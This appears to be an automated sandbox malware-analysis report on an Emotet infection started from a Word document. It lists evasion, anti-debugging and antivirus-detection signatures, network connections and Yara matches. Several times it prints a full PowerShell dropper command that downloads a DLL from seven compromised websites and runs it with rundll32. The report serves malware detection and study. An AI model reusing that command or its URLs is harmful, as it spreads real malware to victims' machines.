Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A6672 second address: 00000000615A66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF82C79A621h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A8A23 second address: 00000000615A8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF82C79A43Eh 0x00000007 rdtscp

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 6456	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3738			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1230			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 4.0 %

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000005.00000003.312282002.0000000004F7A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000005.00000002.340816682.0000000004A9A000.00000004.00000001.sdmp	Binary or memory string: ,d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000003.00000002.533812198.0000015122029000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.533685658.0000020B61E67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.533555344.0000023134829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620 mov ecx, dword ptr fs:[00000030h]	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6510 mov eax, dword ptr fs:[00000030h]	14_2_615A6510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B849D mov esi, dword ptr fs:[00000030h]	14_2_615B849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C69AA mov eax, dword ptr fs:[00000030h]	14_2_615C69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A8A50 mov eax, dword ptr fs:[00000030h]	14_2_615A8A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DE10 mov eax, dword ptr fs:[00000030h]	16_2_0068DE10

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B81F2 IsDebuggerPresent,OutputDebugStringW,

14_2_615B81F2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B83A7 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

14_2_615B83A7

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_615B5239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615B5ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615BED41

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191			Jump to behavior

Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D60E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615CE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_615D57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615CDD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_615D5F10

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5916 cpuid

14_2_615B5916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

14_2_615B5C3C

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 0000000A.00000002.533453735.000001A70123D000.00000004.00000001.sdmp	Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.533595093.000001A701302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A1A40 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

14_2_615A1A40

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
